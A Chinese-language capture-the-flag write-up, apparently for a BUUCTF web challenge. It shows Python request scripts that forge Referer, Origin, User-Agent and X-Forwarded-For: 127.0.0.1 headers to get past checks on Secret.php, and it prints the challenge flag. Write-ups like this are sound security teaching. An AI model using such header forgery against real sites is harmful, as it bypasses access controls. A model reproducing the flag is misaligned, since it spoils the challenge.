本文共 1182 字,大约阅读时间需要 3 分钟。
首先查看源码,发现了Scret.php
https://www.Sycsecret.com
访问的,那就使用python修改请求头: import requestsurl = 'http://node3.buuoj.cn:25765/Secret.php'headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}r = requests.get(url,headers=headers)with open("1.html",'w')as f: f.write(r.text)
运行一下,python自动将html代码写入到1.html中,打开1.html:
这里提示我们需要使用”Syclover”浏览器,这里直接修改UA头即可,加一句headers['User-Agent'] = "Syclover"
import requestsurl = 'http://node3.buuoj.cn:25765/Secret.php'headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}headers['User-Agent'] = "Syclover"r = requests.get(url,headers=headers)with open("1.html",'w')as f: f.write(r.text)locally,那就是需要本地访问,即用XFF头进行伪造,加一句
headers['X-Forwarded-For'] = '127.0.0.1'
import requestsurl = 'http://node3.buuoj.cn:25765/Secret.php'headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}headers['User-Agent'] = "Syclover"headers['X-Forwarded-For'] = '127.0.0.1'r = requests.get(url,headers=headers)with open("1.html",'w')as f: f.write(r.text)
flag{dea4ceac-5077-4d04-b0e3-7a7cf17ed028}
不会用python用BP也可以做,附上大佬博客:
https://www.cnblogs.com/wangtanzhi/p/12236844.html